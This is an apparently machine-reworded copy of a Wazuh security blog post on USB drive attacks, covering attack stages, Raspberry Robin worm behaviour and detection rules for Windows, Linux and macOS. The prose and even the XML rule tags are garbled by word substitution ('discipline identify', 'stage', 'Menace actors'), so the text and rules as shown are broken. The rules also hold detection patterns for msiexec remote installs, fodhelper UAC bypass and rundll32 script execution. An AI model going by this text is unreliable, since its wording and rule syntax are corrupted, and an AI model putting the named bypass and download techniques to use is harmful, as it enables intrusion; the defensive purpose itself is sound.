USB drive assaults represent a major cybersecurity threat, profiting from the on a regular basis use of USB gadgets to ship malware and circumvent conventional community security measures. These assaults result in data breaches, monetary losses, and operational disruptions, with lasting impacts on a company’s popularity. An instance is the Stuxnet worm found in 2010, a malware designed to focus on industrial management methods, particularly Iran’s nuclear enrichment services. It exploited a number of zero-day vulnerabilities and unfold primarily by way of USB drives, making it one of many first examples of a cyberattack with real-world bodily results. Stuxnet uncovered the dangers of detachable media and raised world consciousness of cybersecurity threats to crucial infrastructure.
How USB drive assaults propagate
Attackers use numerous strategies to ship malicious payloads by way of USB drives, concentrating on people and organizations.
- Drop assaults: Contaminated USB drives are intentionally left in public areas, comparable to parking heaps, to entice victims to plug them in and infect their computer systems.
- Mail-based assaults: USB drives are despatched to targets by way of mail, disguised as promotional objects or reliable gadgets, to trick them into plugging them into their methods.
- Social engineering: Attackers use psychological techniques to influence victims to attach contaminated USB drives to their computer systems.
- Unsolicited plugging: Attackers plug contaminated USB drives into unattended methods, spreading malware with out sufferer interplay.
How USB drive assaults work
USB drive assaults usually comply with a multi-step course of to infiltrate methods and trigger harm.
- Reconnaissance: Attackers analysis their goal to establish potential vulnerabilities. On this case, they could collect details about the group, its workers, and its operational setting to find out the probability of somebody utilizing a USB drive.
- Weaponization: Menace actors put together the USB drive by embedding malware. This may be achieved by straight infecting the drive or crafting a seemingly benign file, comparable to a doc, video, or picture, which comprises hidden malicious code.
- Supply: Attackers distribute the contaminated USB drive to targets by dropping it in public areas, giving it away as a promotional merchandise, or utilizing social engineering to ship it.
- Exploitation: When the goal connects to the USB drive, the malware is activated routinely or by way of consumer interplay, exploiting system vulnerabilities.
- Set up: The malware is put in on the goal system, gaining persistence. This step permits the attacker to take care of management of the contaminated system even whether it is rebooted or disconnected.
- Command and Management (C2): The malware communicates with the attacker’s server. This permits the attacker to challenge instructions, exfiltrate information, or deploy extra payloads.
- Actions on Aims: The attackers obtain their targets, comparable to stealing delicate information, deploying ransomware, or establishing persistent entry for future exploitation.
 |
| Determine 1: Steps exhibiting how USB Drive assaults work. |
Improve your cybersecurity posture in opposition to USB drive assaults with Wazuh
Wazuh is an open supply security platform that helps organizations detect and reply to security threats by monitoring system actions, from informational occasions to crucial incidents. Organizations can proactively stop breaches and safeguard delicate information by monitoring USB exercise with Wazuh.
Monitoring USB drive actions in Home windows utilizing Wazuh
Wazuh displays USB drive actions on Home windows endpoints utilizing the Audit PNP Exercise characteristic. This characteristic logs Plug and Play (PnP) occasions, which helps establish when USB drives are related. It’s accessible on Home windows 10 Professional and Home windows 11 Professional, Home windows Server 2016, and later variations.
Organizations can configure Wazuh to detect particular system occasions and monitor USB-related occasions, significantly specializing in Home windows occasion ID 6416, which signifies when an exterior system is related. Safety directors can detect USB system connections by creating Wazuh customized guidelines to establish potential security incidents.
The subsequent step consists of making a Fixed Database (CDB) of permitted gadgets’ distinctive system identifiers (DeviceID). This record permits Wazuh to distinguish between licensed and unauthorized gadgets, producing alerts for each classes. As an illustration, when a licensed USB drive is plugged in, it triggers a lower-level alert, whereas unauthorized connections can generate high-severity alerts that point out a possible security breach.
 |
| Determine 2: USB drive plug-in occasions on a monitored Home windows endpoint. |
 |
| Determine 3: Approved USB drive occasion. |
 |
| Determine 4: Unauthorized USB drive occasion. |
Menace detection use case: Detecting the Raspberry Robin USB-Drive actions
Wazuh gives an answer to mitigate USB-related threats, comparable to Raspberry Robin, a Home windows-based worm.
Raspberry Robin targets industries like oil, gasoline, transportation, and tech, inflicting operational disruptions. It spreads by way of disguised .lnk information, positive factors persistence by updating the UserAssist registry, and mimics reliable folders. The worm makes use of reliable Home windows processes comparable to msiexec.exe, rundll32.exe, odbcconf.exe, and fodhelper.exe to execute, persist, and obtain extra malicious parts. Its reliance on TOR-based command and management (C2) servers for outbound communication provides stealth and complicates detection.
Wazuh detects Raspberry Robin by monitoring registry modifications, uncommon command execution patterns, and suspicious system binaries use. Its real-time file integrity monitoring and menace detection guidelines establish malicious exercise, enabling swift response to mitigate potential disruptions.
Wazuh detects and mitigates Raspberry Robin by monitoring and responding to suspicious exercise like:
- Anomalous cmd.exe actions: terminating suspicious processes or isolating affected endpoints.
- Flagging msiexec.exe downloads from obscure domains, blocking connections, and alerting directors.
- Detecting UAC bypass by way of fodhelper.exe, terminating the method, and notifying directors.
- Blocking uncommon outbound connections by rundll32.exe and dllhost.exe.
Under is a pattern customized rule configuration that detects attainable Raspberry Robin actions.
<rule id="100100" stage="12">
<if_sid>92004</if_sid>
<discipline identify="win.eventdata.picture" kind="pcre2">(?i)cmd.exe$</discipline>
<discipline identify="win.eventdata.commandLine" kind="pcre2">(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd</discipline>
<description>Attainable Raspberry Robin execution on $(win.system.pc)</description>
<mitre>
<id>T1059.003</id>
</mitre>
</rule>
<rule id="100101" stage="7">
<if_sid>61603</if_sid>
<discipline identify="win.eventdata.picture" kind="pcre2">(?i)msiexec.exe$</discipline>
<discipline identify="win.eventdata.commandLine" kind="pcre2">(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+[.msi]{0,1}</discipline>
<description>msiexec.exe downloading and executing packages on $(win.system.pc)</description>
<mitre>
<id>T1218.007</id>
</mitre>
</rule>
<rule id="100103" stage="12">
<if_sid>61603</if_sid>
<discipline identify="win.eventdata.originalFileName" kind="pcre2">(?i)(cmd|powershell|rundll32).exe</discipline>
<discipline identify="win.eventdata.parentImage" kind="pcre2">(?i)fodhelper.exe</discipline>
<description>Use of fodhelper.exe to bypass UAC on $(win.system.pc)</description>
<mitre>
<id>T1548.002</id>
</mitre>
</rule>
<rule id="100105" stage="10">
<if_sid>61603</if_sid>
<discipline identify="win.eventdata.commandLine" kind="pcre2">(regsvr32.exe|rundll32.exe|dllhost.exe).*";doc.write();GetObject("script:.*).Exec()</discipline>
<description>Attainable Raspberry Robin execution on $(win.system.pc)</description>
<mitre>
<id>T1218.011</id>
</mitre>
</rule>
 |
| Determine 5: Raspberry Robin IoCs and behaviors detected on a monitored Home windows endpoint. |
 |
| Determine 6: An alert exhibiting the Raspberry Robin IoCs detected on a monitored Home windows endpoint. |
For extra particulars on detecting the Raspberry Robin worm utilizing Wazuh, please go to this weblog.
Monitoring USB drives in Linux utilizing Wazuh
USB drives also can introduce security dangers to Linux endpoints as potential vectors for malware and unauthorized information entry. udev is a system utility on Linux that routinely detects and manages exterior gadgets, comparable to USB drives, when plugged in. It creates the required system information within the /dev listing in order that the system can work together with them. Directors can create customized udev guidelines that generate detailed occasions, offering insights into USB exercise. Wazuh has built-in guidelines for USB monitoring, however udev-generated occasions present richer particulars, bettering menace detection.
We configure udev guidelines on our Linux endpoints to set off a logging script at any time when a USB system is related. The Wazuh agent should be set as much as learn the generated JSON log file produced from the logging script, permitting it to course of and analyze USB exercise.
Just like the Home windows USB drive monitoring, you want a relentless database (CDB) record of licensed USB system serial numbers. Wazuh will evaluate incoming connections in opposition to this record, triggering alerts for unauthorized gadgets.
 |
| Determine 7: USB drive alerts for a monitored Linux endpoint. |
 |
| Determine 8: An unauthorized USB drive occasion on a monitored Linux endpoint. |
The weblog submit on Monitoring USB drives in Linux utilizing Wazuh gives extra info on monitoring USB drives plugged into Linux endpoints.
Monitoring USB drives in macOS utilizing Wazuh
You should use a customized script to log crucial occasions associated to USB gadgets on macOS endpoints after which configure Wazuh to watch these occasions. Directors can extract info comparable to connection and disconnection occasions, vendor IDs, product IDs, and serial numbers of USB drives plugged in. This script interacts with macOS’s I/O Package framework to assemble USB system info, which is then formatted as JSON and saved to a log file. The log information generated from this tradition script is distributed to the Wazuh server for evaluation utilizing the Wazuh agent.
The weblog submit on Monitoring USB drives in macOS utilizing Wazuh reveals the steps to watch USB drives on macOS endpoints.
 |
| Determine 9: USB drive alerts on a monitored macOS endpoint. |
 |
| Determine 10: Unauthorized USB drive alert on a monitored macOS endpoint. |
Conclusion
USB drive assaults pose a security threat throughout main working methods, enabling malware propagation and unauthorized entry to malicious actors.
Wazuh presents numerous detection mechanisms to extend the probabilities of detecting USB Drive assaults and mitigate the potential influence. Organizations can improve cybersecurity by integrating these detection strategies and implementing strict USB entry insurance policies.
